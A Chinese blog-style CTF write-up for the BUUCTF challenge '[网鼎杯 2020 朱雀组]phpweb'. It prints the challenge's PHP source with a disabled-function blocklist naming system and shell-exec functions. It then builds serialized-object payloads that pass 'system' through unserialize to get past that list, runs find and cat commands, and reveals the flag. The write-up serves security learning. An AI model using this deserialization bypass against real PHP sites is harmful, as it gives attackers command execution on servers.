0
点赞
收藏
分享

微信扫一扫

BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb

书呆鱼 2022-04-27 阅读 71
web安全

BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb


  • 进入环境,发现调用了date()函数,抓包后发现POST传参存在名为func,值为date的变量

  • 尝试修改func变量

    func=echo&p=Y-m-d+h%3Ai%3As+a
    

    回显

    Warning :  call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function name in <b>/var/www/html/index.php on line 24
    
  • 发现一个PHP代码执行漏洞,可以利用call_user_func()进行,尝试许多参数如shell_exec,system等均被过滤,尝试读取index.php文件内容

    func=file_get_contents&p=index.php
    

    回显

    <?php
    $disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");
    function gettime($func, $p)
    {
        $result = call_user_func($func, $p);
        $a = gettype($result);
        if ($a == "string") {
            return $result;
        } else {
            return "";
        }
    }
    
    class Test
    {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
    
        function __destruct()
        {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
    
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func, $disable_fun)) {
            echo gettime($func, $p);
        } else {
            die("Hacker...");
        }
    }
    ?>
    
  • 发现Test类中存在__destruct()函数,怀疑存在反序列化漏洞

    <?php
    class Test
    {
        var $p = "find / -name flag*";
        var $func = "system";
    }
    
    $res = new Test();
    echo serialize($res);
    
    
    O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
    
  • 构造payload

    func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a18%3a%22find%20%2f%20-name%20flag*%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
    

    回显

       /proc/sys/kernel/sched_domain/cpu0/domain0/flags
    /proc/sys/kernel/sched_domain/cpu1/domain0/flags
    /proc/sys/kernel/sched_domain/cpu10/domain0/flags
    /proc/sys/kernel/sched_domain/cpu11/domain0/flags
    /proc/sys/kernel/sched_domain/cpu12/domain0/flags
    /proc/sys/kernel/sched_domain/cpu13/domain0/flags
    /proc/sys/kernel/sched_domain/cpu14/domain0/flags
    /proc/sys/kernel/sched_domain/cpu15/domain0/flags
    /proc/sys/kernel/sched_domain/cpu16/domain0/flags
    /proc/sys/kernel/sched_domain/cpu17/domain0/flags
    /proc/sys/kernel/sched_domain/cpu18/domain0/flags
    /proc/sys/kernel/sched_domain/cpu19/domain0/flags
    /proc/sys/kernel/sched_domain/cpu2/domain0/flags
    /proc/sys/kernel/sched_domain/cpu20/domain0/flags
    /proc/sys/kernel/sched_domain/cpu21/domain0/flags
    /proc/sys/kernel/sched_domain/cpu22/domain0/flags
    /proc/sys/kernel/sched_domain/cpu23/domain0/flags
    /proc/sys/kernel/sched_domain/cpu24/domain0/flags
    /proc/sys/kernel/sched_domain/cpu25/domain0/flags
    /proc/sys/kernel/sched_domain/cpu26/domain0/flags
    /proc/sys/kernel/sched_domain/cpu27/domain0/flags
    /proc/sys/kernel/sched_domain/cpu28/domain0/flags
    /proc/sys/kernel/sched_domain/cpu29/domain0/flags
    /proc/sys/kernel/sched_domain/cpu3/domain0/flags
    /proc/sys/kernel/sched_domain/cpu30/domain0/flags
    /proc/sys/kernel/sched_domain/cpu31/domain0/flags
    /proc/sys/kernel/sched_domain/cpu4/domain0/flags
    /proc/sys/kernel/sched_domain/cpu5/domain0/flags
    /proc/sys/kernel/sched_domain/cpu6/domain0/flags
    /proc/sys/kernel/sched_domain/cpu7/domain0/flags
    /proc/sys/kernel/sched_domain/cpu8/domain0/flags
    /proc/sys/kernel/sched_domain/cpu9/domain0/flags
    /sys/devices/pnp0/00:00/tty/ttyS0/flags
    /sys/devices/platform/serial8250/tty/ttyS15/flags
    /sys/devices/platform/serial8250/tty/ttyS6/flags
    /sys/devices/platform/serial8250/tty/ttyS23/flags
    /sys/devices/platform/serial8250/tty/ttyS13/flags
    /sys/devices/platform/serial8250/tty/ttyS31/flags
    /sys/devices/platform/serial8250/tty/ttyS4/flags
    /sys/devices/platform/serial8250/tty/ttyS21/flags
    /sys/devices/platform/serial8250/tty/ttyS11/flags
    /sys/devices/platform/serial8250/tty/ttyS2/flags
    /sys/devices/platform/serial8250/tty/ttyS28/flags
    /sys/devices/platform/serial8250/tty/ttyS18/flags
    /sys/devices/platform/serial8250/tty/ttyS9/flags
    /sys/devices/platform/serial8250/tty/ttyS26/flags
    /sys/devices/platform/serial8250/tty/ttyS16/flags
    /sys/devices/platform/serial8250/tty/ttyS7/flags
    /sys/devices/platform/serial8250/tty/ttyS24/flags
    /sys/devices/platform/serial8250/tty/ttyS14/flags
    /sys/devices/platform/serial8250/tty/ttyS5/flags
    /sys/devices/platform/serial8250/tty/ttyS22/flags
    /sys/devices/platform/serial8250/tty/ttyS12/flags
    /sys/devices/platform/serial8250/tty/ttyS30/flags
    /sys/devices/platform/serial8250/tty/ttyS3/flags
    /sys/devices/platform/serial8250/tty/ttyS20/flags
    /sys/devices/platform/serial8250/tty/ttyS10/flags
    /sys/devices/platform/serial8250/tty/ttyS29/flags
    /sys/devices/platform/serial8250/tty/ttyS1/flags
    /sys/devices/platform/serial8250/tty/ttyS19/flags
    /sys/devices/platform/serial8250/tty/ttyS27/flags
    /sys/devices/platform/serial8250/tty/ttyS17/flags
    /sys/devices/platform/serial8250/tty/ttyS8/flags
    /sys/devices/platform/serial8250/tty/ttyS25/flags
    /sys/devices/virtual/net/lo/flags
    /sys/devices/virtual/net/eth0/flags
    /sys/devices/virtual/net/tunl0/flags
    /tmp/flagoefiu4r93
    /tmp/flagoefiu4r93
    
  • 最后在/tmp/flagoefiu4r93中找到flag

    func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a22%3a%22cat%20%2ftmp%2fflagoefiu4r93%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
    
    flag{0ae2a444-4095-4452-9301-78e18c2a60b6}
    
举报

相关推荐

0 条评论